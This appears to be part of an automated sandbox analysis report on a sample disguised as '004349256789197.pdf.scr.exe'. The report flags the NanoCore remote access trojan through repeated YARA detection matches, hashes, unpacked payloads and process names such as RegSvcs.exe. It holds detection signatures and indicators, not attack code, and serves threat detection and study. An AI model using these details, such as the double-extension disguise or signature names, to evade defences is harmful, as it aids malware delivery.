Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: initial sample Static PE information: Filename: 004349256789197.pdf.scr.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D848E 0_2_003D848E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E6CDC 0_2_003E6CDC
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E00B7 0_2_003E00B7
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E4088 0_2_003E4088
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D40FE 0_2_003D40FE
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E7153 0_2_003E7153
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F51C9 0_2_003F51C9
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D32F7 0_2_003D32F7
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E62CA 0_2_003E62CA
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E43BF 0_2_003E43BF
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DC426 0_2_003DC426
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DF461 0_2_003DF461
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FD440 0_2_003FD440
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E77EF 0_2_003E77EF
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D286B 0_2_003D286B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FD8EE 0_2_003FD8EE
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DE9B7 0_2_003DE9B7
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_004019F4 0_2_004019F4
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E3E0B 0_2_003E3E0B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F4F9A 0_2_003F4F9A
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DEFE2 0_2_003DEFE2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BBE0BE 6_2_00BBE0BE
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC8037 6_2_00BC8037
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC2007 6_2_00BC2007
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BAE1A0 6_2_00BAE1A0
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDA28E 6_2_00BDA28E
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC22C2 6_2_00BC22C2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA225D 6_2_00BA225D
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BBC59E 6_2_00BBC59E
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C2C7A3 6_2_00C2C7A3
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDE89F 6_2_00BDE89F
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1291A 6_2_00C1291A
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD6AFB 6_2_00BD6AFB
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C08B27 6_2_00C08B27
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BCCE30 6_2_00BCCE30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C351D2 6_2_00C351D2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD7169 6_2_00BD7169
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA9240 6_2_00BA9240
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA9499 6_2_00BA9499
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: 004349256789197.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
